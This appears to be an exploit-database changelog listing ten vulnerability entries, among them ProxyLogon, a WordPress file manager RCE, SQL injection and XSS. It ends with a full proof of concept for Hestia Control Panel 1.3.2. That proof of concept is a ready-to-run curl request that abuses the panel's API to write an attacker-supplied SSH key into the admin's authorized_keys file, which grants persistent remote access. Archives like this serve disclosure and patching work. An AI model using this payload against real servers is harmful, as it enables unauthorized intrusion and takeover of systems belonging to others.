
9 changes to exploits/shellcodes

VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path
Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)
WordPress Plugin Wp-FileManager 6.8 - RCE
Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)
Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) (PoC)
rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS
SEO Panel 4.8.0 - 'order_col' Blind SQL Injection
Hestia Control Panel 1.3.2 - Arbitrary File Write
rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)

# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write
# Date: 07.03.2021
# Author: Numan Türle
# Vendor Homepage: https://hestiacp.com/
# Software Link: https://github.com/hestiacp/hestiacp
# Version: < 1.3.3
# Tested on: HestiaCP Version 1.3.2

curl --location --request POST 'https://TARGET:8083/api/index.php' \
  --form 'hash="HERE_API_KEY"' \
  --form 'returncode="yes"' \
  --form 'cmd="v-make-tmp-file"' \
  --form 'arg1="ssh-rsa HERE_KEY"' \
  --form 'arg2="/home/admin/.ssh/authorized_keys"' \
  --form 'arg3=""' \
  --form 'arg4=""' \
  --form 'arg5=""'